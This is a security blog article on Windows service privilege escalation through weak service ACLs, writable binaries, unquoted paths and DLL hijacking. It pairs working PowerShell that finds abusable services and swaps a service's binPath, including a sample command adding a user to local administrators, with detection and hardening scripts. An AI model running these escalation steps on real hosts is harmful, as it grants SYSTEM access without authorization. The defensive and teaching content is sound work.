Windows Service Abuse: Weak Permissions, Unquoted Paths, DLL Hijacking
Cybersecurity
Four service-level privesc vectors (weak service ACLs, writable binaries, unquoted paths, DLL hijacking) that still work in modern Windows fleets. How to find them with accesschk and PowerUp, how to weaponize them, and how to harden services that actually need to run.
By Arjun Raghavan, Security & Systems Lead, BIPI · April 8, 2025 · 10 min read
Why services are still the softest target
Services run as LocalSystem, LocalService or NetworkService, start without anyone logged on, and are restarted by the Service Control Manager on every boot. If a low-privilege user can rewrite the service binary, a DLL it loads, or the path the SCM resolves, that user runs code as the service account at the next service start or reboot. Vendor installers still ship with sloppy ACLs and unquoted paths.
Vector 1: weak service ACLs
If the service DACL grants you SERVICE_CHANGE_CONFIG on a service that runs as LocalSystem, you can repoint binPath to any command and the SCM executes it as SYSTEM the next time the service starts. You still need a trigger: SERVICE_START (plus SERVICE_STOP if the service is running), or an auto-start service and a reboot. Find candidates with accesschk.exe -uwcqv "Authenticated Users" * (the -c switch selects services) or PowerUp's Get-ModifiableService. PowerUp's Invoke-ServiceAbuse automates the whole sequence: by default it adds a local administrator account and restores the original binPath afterwards.
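The same check and abuse done by hand, as an added example written for this article (it is not PowerUp's code). It parses each service's DACL from sc.exe sdshow, reports the services on which the current token holds a config-write right, and then performs the binPath swap. The service name VulnSvc and the user lowpriv in the usage lines are placeholders.

```powershell
# Service access rights (winsvc.h) and the standard/generic rights that imply them.
$SERVICE_CHANGE_CONFIG = 0x0002
$SERVICE_START         = 0x0010
$SERVICE_STOP          = 0x0020
$WRITE_DAC             = 0x40000      # rewrite the DACL, then grant yourself everything
$WRITE_OWNER           = 0x80000
$GENERIC_ALL           = 0x10000000
$GENERIC_WRITE         = 0x40000000   # maps to SERVICE_CHANGE_CONFIG for service objects
$ConfigWriteMask = $SERVICE_CHANGE_CONFIG -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL -bor $GENERIC_WRITE

# SIDs the current token carries: the user plus every group. Deny-only groups are
# not distinguished here; the kernel's AccessCheck is the final authority.
$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$MySids = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

function Get-ServiceSddl([string]$Name) {
    # sc.exe sdshow needs READ_CONTROL, which almost every service DACL grants broadly.
    # Output is an empty line followed by the SDDL on its own line.
    $line = sc.exe sdshow $Name | Where-Object { $_ -match '^\s*D:' } | Select-Object -First 1
    if ($line) { $line.Trim() }
}

function Get-MyServiceRights([string]$Name) {
    $sddl = Get-ServiceSddl $Name
    if (-not $sddl) { return 0 }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    $allowed = 0; $denied = 0
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($MySids -notcontains $ace.SecurityIdentifier.Value) { continue }
        if ($ace.AceType -eq 'AccessAllowed')    { $allowed = $allowed -bor $ace.AccessMask }
        elseif ($ace.AceType -eq 'AccessDenied') { $denied  = $denied  -bor $ace.AccessMask }
    }
    # A deny ACE wins over an allow ACE for the same bits.
    return $allowed -band (-bnot $denied)
}

function Find-AbusableService {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        $rights = Get-MyServiceRights $svc.Name
        if (-not ($rights -band $ConfigWriteMask)) { return }
        [pscustomobject]@{
            Name      = $svc.Name
            RunsAs    = $svc.StartName          # LocalSystem is the prize
            StartMode = $svc.StartMode          # Auto: a reboot is a valid trigger
            CanConfig = [bool]($rights -band ($SERVICE_CHANGE_CONFIG -bor $GENERIC_WRITE -bor $GENERIC_ALL))
            CanStart  = [bool]($rights -band ($SERVICE_START -bor $GENERIC_ALL))
            CanStop   = [bool]($rights -band ($SERVICE_STOP -bor $GENERIC_ALL))
            WriteDac  = [bool]($rights -band ($WRITE_DAC -bor $WRITE_OWNER))
        }
    }
}

# The SCM runs whatever binPath says, as the service account. A plain command never
# calls StartServiceCtrlDispatcher, so sc.exe start reports a failure after the
# command has already run as SYSTEM. The original binPath is restored so the service
# keeps working; use -NoRestore when you hold no SERVICE_START and are relying on an
# auto-start service plus a reboot.
function Invoke-BinPathAbuse([string]$Name, [string]$Command, [switch]$NoRestore) {
    $original = (Get-CimInstance Win32_Service -Filter "Name='$Name'").PathName
    sc.exe config $Name binPath= $Command | Out-Null
    sc.exe stop $Name  | Out-Null    # harmless if already stopped or without SERVICE_STOP
    sc.exe start $Name | Out-Null    # needs SERVICE_START
    if (-not $NoRestore) {
        # Caveat: if $original itself contains double quotes, Windows PowerShell's
        # native-command quoting can mangle it; verify with sc.exe qc afterwards.
        sc.exe config $Name binPath= $original | Out-Null
    }
}

# Usage (placeholder names):
#   Find-AbusableService | Format-Table -AutoSize
#   Invoke-BinPathAbuse -Name VulnSvc -Command 'cmd.exe /c net localgroup administrators lowpriv /add'
```

Run it from an unelevated shell; a hit with RunsAs = LocalSystem and CanStart = True is a direct path to SYSTEM, a hit with only WriteDac is one extra step (rewrite the DACL with sc.exe sdset first).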
Vector 2: writable service binary
- accesschk.exe -quvw "Authenticated Users" C:\path\to\service.exe, or sweep a whole tree with accesschk.exe -quvws Users "C:\Program Files"
- If write is granted, back up the binary, overwrite it with yours and restart the service. A running image is locked against writes, so you need SERVICE_STOP or a reboot; DELETE on the file plus write on the directory also works (rename the running exe, drop yours under the old name)
- Common with third-party agents in C:\Program Files\Vendor\ whose installer granted Users or Authenticated Users Modify on the install directory
- Pair with sc stop and sc start when the service DACL gives you SERVICE_STOP and SERVICE_START; otherwise wait for the next reboot
Vector 3: unquoted service paths
When binPath is C:\Program Files\Some Vendor\Sub Dir\svc.exe without quotes, the SCM hands that string to CreateProcess, which cannot tell where the path ends and the arguments begin. It tries each prefix up to a space in turn, appending .exe when the candidate has no extension: C:\Program.exe, then C:\Program Files\Some.exe, then C:\Program Files\Some Vendor\Sub.exe, and only then the real binary. If any of those directories lets you create files, plant a binary under the candidate name and the SCM runs it as the service account at the next start. On a default install C:\ and C:\Program Files do not allow standard users to create files; the real finds are vendor-created directories with loose ACLs. As with Vector 1, you need SERVICE_START on the service or an auto-start service plus a reboot.
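An added example (written for this article, not PowerUp's code) that covers Vectors 2 and 3 in one pass: for every service it reproduces the CreateProcess walk over an unquoted path and reports which candidate locations the current user can create files in, and it checks whether the real service binary itself is writable. Directory writability is tested by actually creating a delete-on-close temp file, which is exact but briefly touches the disk; binary writability is read from the file DACL, because a running image cannot be opened for write regardless of its ACL.

```powershell
function Get-UnquotedCandidates([string]$PathName) {
    # Paths CreateProcess tries before it reaches the real executable of an unquoted binPath.
    if (-not $PathName -or $PathName.StartsWith('"')) { return @() }   # quoted: not affected
    $tokens = $PathName -split ' '
    $out = @()
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $p = $tokens[0..($i - 1)] -join ' '
        if ($p -notmatch '\.[^\\]+$') { $p += '.exe' }          # .exe is appended when there is no extension
        if (Test-Path -LiteralPath $p -PathType Leaf) { break }  # real image found: the walk stops here
        $out += $p
    }
    return $out
}

function Test-DirectoryWritable([string]$Dir) {
    # Effective test: can we create a file here? DeleteOnClose removes the probe.
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([System.IO.Path]::GetRandomFileName())
    try {
        $fs = [System.IO.File]::Create($probe, 4096, [System.IO.FileOptions]::DeleteOnClose)
        $fs.Dispose()
        return $true
    } catch { return $false }
}

# File rights that let you replace the content or take over the DACL:
# WriteData, WRITE_DAC, WRITE_OWNER, GENERIC_ALL, GENERIC_WRITE.
$FileWriteBits = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$MySids = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

function Test-FileWritableByAcl([string]$Path) {
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }  # no READ_CONTROL
    $allowed = 0; $denied = 0
    foreach ($rule in $acl.Access) {
        try   { $sid = $rule.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { $sid = $rule.IdentityReference.Value }      # orphaned SID, already in S-1-... form
        if ($MySids -notcontains $sid) { continue }
        $mask = [int]$rule.FileSystemRights
        if ($rule.AccessControlType -eq 'Allow') { $allowed = $allowed -bor $mask } else { $denied = $denied -bor $mask }
    }
    return [bool](($allowed -band (-bnot $denied)) -band $FileWriteBits)
}

function Find-WritableServicePath {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }
        # Vector 3: a writable directory anywhere on the unquoted-path walk.
        foreach ($cand in @(Get-UnquotedCandidates $svc.PathName)) {
            $dir = Split-Path -Parent $cand
            if ($dir -and (Test-DirectoryWritable $dir)) {
                [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Vector = 'unquoted path'; Plant = $cand }
            }
        }
        # Vector 2: the real image. Quoted paths are trivial; for unquoted ones take
        # the longest leading prefix that exists on disk.
        $exe = $null
        if ($svc.PathName -match '^"([^"]+)"') { $exe = $Matches[1] }
        else {
            $tokens = $svc.PathName -split ' '
            for ($i = $tokens.Count; $i -ge 1; $i--) {
                $p = $tokens[0..($i - 1)] -join ' '
                if (Test-Path -LiteralPath $p -PathType Leaf) { $exe = $p; break }
            }
        }
        if ($exe -and (Test-FileWritableByAcl $exe)) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Vector = 'writable binary'; Plant = $exe }
        }
    }
}

# Usage: Find-WritableServicePath | Format-Table -AutoSize
```

Each row's Plant column is the exact path to write to; cross-check RunsAs and the start rights from Vector 1 before spending time on a LocalService-only hit.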
Vector 4: DLL hijacking and phantom DLLs
- Procmon filter: Process Name is the service exe, Operation is CreateFile, Path ends with .dll, Result is NAME NOT FOUND
- Identify DLLs the service searches for but never finds (phantom DLLs) and where it looks: with SafeDllSearchMode (the default) the order is the application directory, System32, System, the Windows directory, the current directory, then PATH. Names on the KnownDLLs list are resolved from the KnownDLLs object directory and cannot be hijacked this way
- Drop a DLL with the matching name into the first directory on that search path you can write to. It must export whatever the service resolves by name or the load fails; when the service only calls LoadLibrary, a DllMain that runs your payload on DLL_PROCESS_ATTACH is enough
- Confirm the load by checking the process module list (Procmon Load Image events, or the Modules property of the process), then restart the service so the DLL is loaded as SYSTEM
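An added example for the confirmation step (written for this article, not from any tool the page names): it resolves a service to its process, walks the loaded module list, and reports every module that either sits outside the Windows directory and the service's own install directory or does not carry a valid Authenticode signature. Reading another account's process modules needs administrator rights, so run it elevated for SYSTEM services; a 32-bit PowerShell cannot read a 64-bit process's modules.

```powershell
function Get-SuspectServiceModules([string]$ServiceName) {
    $svc = Get-CimInstance Win32_Service -Filter "Name='$ServiceName'"
    if (-not $svc -or $svc.ProcessId -eq 0) { throw "$ServiceName is not running" }
    $proc   = Get-Process -Id $svc.ProcessId
    $exeDir = Split-Path -Parent $proc.Path
    $winDir = $env:SystemRoot
    $cmp    = [System.StringComparison]::OrdinalIgnoreCase
    foreach ($m in $proc.Modules) {
        $inExpected = $m.FileName.StartsWith($winDir, $cmp) -or $m.FileName.StartsWith($exeDir, $cmp)
        # Valid: signed and chained to a trusted root. Microsoft OS files are mostly
        # catalog-signed; a NotSigned on one of those on an old system is a catalog
        # lookup gap, not a hijack. A third-party DLL showing NotSigned is the finding.
        $sig    = Get-AuthenticodeSignature -FilePath $m.FileName
        $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
        if (-not $inExpected -or $sig.Status -ne 'Valid') {
            [pscustomobject]@{
                Module    = $m.ModuleName
                Path      = $m.FileName
                InExpectedDir = $inExpected
                Signature = $sig.Status
                Signer    = $signer
            }
        }
    }
}

# Usage (placeholder service name):
#   Get-SuspectServiceModules -Name VulnSvc | Format-Table -AutoSize
```

On the attacking side this tells you whether the planted DLL actually loaded; on the defending side the same listing, run across every service process, is a cheap baseline for the Sysmon Event 7 allowlist discussed under Detection.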
Real CVEs you will still encounter
- CVE-2022-26904: a race condition in the Windows User Profile Service (exploited by the public SuperProfile PoC), a reminder that built-in services are in scope, not only vendor agents
- CVE-2021-1675 / CVE-2021-34527 (PrintNightmare): the Print Spooler service loading an attacker-supplied printer driver DLL as SYSTEM
- Many vendor LPE CVEs in EDR and backup agents caused by unquoted paths and install directories writable by Users
Detection
Service Control Manager events in the System log: 7045 records every new service install (name, image path, account), and 7036 records each start and stop. 7040 records only start-type changes, not a new binPath, so an abused existing service leaves no SCM event for the change itself. Catch the binPath rewrite at the registry instead: Sysmon Event 13 (RegistryEvent, value set) or Security 4657 with a SACL on HKLM\SYSTEM\CurrentControlSet\Services\*\ImagePath. Security 4697 mirrors 7045 in the Security log once "Audit Security System Extension" is enabled. Sysmon Event 7 (image loaded) catches DLL side-loads when you baseline the signed modules each service process normally loads and alert on unsigned or unexpected paths. EDRs increasingly flag binPath values that point outside Program Files and System32.
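An added example for the 7045 side of this (written for this article, not vendor detection content): it pulls Service Control Manager 7045 events from the System log and flags image paths a defender should look at. It assumes the standard 7045 EventData field names (ServiceName, ImagePath, ServiceType, StartType, AccountName); the sample image paths at the end are constructed, not real events.

```powershell
# Roots a legitimate service image normally lives under, and roots a standard user can write to.
$TrustedRoots  = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }
$WritableRoots = @("$env:SystemRoot\Temp", $env:ProgramData, "$env:SystemDrive\Users", "$env:SystemDrive\Temp")
# Interpreters and LOLBins that have no business being a service image.
$Lolbins = 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'rundll32.exe', 'regsvr32.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe'

function Test-SuspiciousImagePath([string]$ImagePath) {
    # Returns the reasons to look at this image path; nothing means it looks normal.
    if (-not $ImagePath) { return @('empty image path') }
    $reasons = @()
    $cmp = [System.StringComparison]::OrdinalIgnoreCase
    $p = [Environment]::ExpandEnvironmentVariables($ImagePath.Trim())   # 7045 often has %SystemRoot%
    if ($p -match '^"([^"]+)"') {
        $exe = $Matches[1]
    } else {
        $exe = ($p -split ' ')[0]
        # An unquoted path whose first token is not a file name is the Vector 3 pattern.
        if ($p -match ' ' -and $exe -notmatch '\.(exe|sys|dll)$') { $reasons += 'unquoted path with spaces' }
    }
    $name = Split-Path -Leaf $exe
    if ($Lolbins -contains $name.ToLower()) { $reasons += "interpreter as service image ($name)" }
    if ($WritableRoots | Where-Object { $p.StartsWith($_, $cmp) }) { $reasons += 'image in a user-writable location' }
    elseif (-not ($TrustedRoots | Where-Object { $p.StartsWith($_, $cmp) })) { $reasons += 'image outside Windows and Program Files' }
    return $reasons
}

function Get-SuspiciousServiceInstalls([int]$MaxEvents = 200) {
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045 } `
                           -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($item in $x.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }
        $why = Test-SuspiciousImagePath $d['ImagePath']
        if ($why) {
            [pscustomobject]@{
                Time      = $e.TimeCreated
                Service   = $d['ServiceName']
                Account   = $d['AccountName']
                ImagePath = $d['ImagePath']
                Reasons   = ($why -join '; ')
            }
        }
    }
}

# Constructed sample image paths (not real events) showing what the check reacts to.
$samples = @(
    '"C:\Program Files\Vendor\agent.exe" -service',                              # properly quoted
    'C:\Program Files\Vendor\agent.exe',                                         # unquoted, spaces
    '%SystemRoot%\System32\cmd.exe /c net localgroup administrators bob /add',   # cmd.exe as the image
    'C:\ProgramData\updater\svc.exe'                                             # lives under ProgramData
)
foreach ($s in $samples) { '{0,-75} => {1}' -f $s, ((Test-SuspiciousImagePath $s) -join '; ') }

# Live: Get-SuspiciousServiceInstalls | Format-Table -AutoSize
```

Security 4697 carries the same information under the names ServiceName and ServiceFileName; point the same Test-SuspiciousImagePath at that field to cover hosts where the System log has rolled over.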
Hardening
- Quote every service path: audit with PowerUp's Get-ServiceUnquoted (or a query over Win32_Service PathName) and fix with sc config binPath= or by editing ImagePath under HKLM\SYSTEM\CurrentControlSet\Services
- Restrict service DACLs to administrators and SYSTEM: strip write rights for Authenticated Users, Users and Everyone with sc sdset, and make sure the install directory is not writable by non-admins either
- Run services under LocalService, NetworkService or a virtual service account rather than LocalSystem where the vendor allows it; Mandatory ASLR and CFG are worth enabling but do not mitigate any of these four vectors, which need no memory corruption
- Sign all in-house DLLs and service binaries, deploy WDAC in audit mode first and then enforce it; WDAC blocks an unsigned hijack DLL even when the directory is writable
- Defender ASR rules such as "Block executable content from email and webmail clients" limit initial access but do not address service abuse; treat them as a complement to fixing the ACLs, not a substitute
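An added remediation example for the first two bullets (written for this article, not PowerUp's code), to be run as administrator: one function quotes every unquoted binPath that contains spaces, the other strips config-write rights for broad groups from a service's DACL while keeping that group's read and start rights. Both have a -Preview switch that prints what would change.

```powershell
function Repair-UnquotedServicePath([switch]$Preview) {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        $p = $svc.PathName
        if (-not $p -or $p.StartsWith('"')) { return }
        $tokens = $p -split ' '
        $exe = $null
        for ($i = $tokens.Count; $i -ge 1; $i--) {        # longest leading prefix that is a real file
            $cand = $tokens[0..($i - 1)] -join ' '
            if (Test-Path -LiteralPath $cand -PathType Leaf) { $exe = $cand; $argStart = $i; break }
        }
        if (-not $exe -or $exe -notmatch ' ') { return }  # image not on disk, or no spaces: nothing to fix
        $rest  = if ($argStart -lt $tokens.Count) { ' ' + ($tokens[$argStart..($tokens.Count - 1)] -join ' ') } else { '' }
        $fixed = '"' + $exe + '"' + $rest
        if ($Preview) { "$($svc.Name): $p  ->  $fixed"; return }
        # Writing ImagePath directly sidesteps sc.exe's command-line quoting; the SCM reads
        # the value at the next service start, exactly as it does after sc.exe config.
        Set-ItemProperty -LiteralPath "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)" `
                         -Name ImagePath -Value $fixed -Type ExpandString
    }
}

# Well-known SIDs that must never hold write rights on a service object:
# Everyone, Authenticated Users, Users, Interactive, Guests.
$BroadSids   = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4', 'S-1-5-32-546'
# SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_ALL, GENERIC_WRITE
$ConfigWrite = 0x0002 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Repair-ServiceDacl([string]$Name, [switch]$Preview) {
    $sddl = (sc.exe sdshow $Name | Where-Object { $_ -match '^\s*D:' } | Select-Object -First 1).Trim()
    $sd   = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    $dacl = $sd.DiscretionaryAcl
    for ($i = $dacl.Count - 1; $i -ge 0; $i--) {
        $ace = $dacl[$i]
        if ($ace.AceType -ne 'AccessAllowed' -or $BroadSids -notcontains $ace.SecurityIdentifier.Value) { continue }
        if (-not ($ace.AccessMask -band $ConfigWrite)) { continue }
        # Keep whatever else the group had (query, start, etc.); drop only the write bits.
        $ace.AccessMask = $ace.AccessMask -band (-bnot $ConfigWrite)
        if ($ace.AccessMask -eq 0) { $dacl.RemoveAce($i) }
    }
    $new = $sd.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All)
    if ($Preview) { "$Name`n  before: $sddl`n  after:  $new"; return }
    sc.exe sdset $Name $new | Out-Null
}

# Usage (placeholder service name):
#   Repair-UnquotedServicePath -Preview
#   Repair-ServiceDacl -Name VulnSvc -Preview
```

Re-run the Vector 1 and Vector 3 checks afterwards; a vendor updater that rewrites its own service entry on every upgrade will silently undo both fixes, which is worth a scheduled re-audit rather than a one-off.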
If you skip service enumeration you skip the easiest SYSTEM in the building.
Read more field notes, explore our services, or get in touch at info@bipi.in.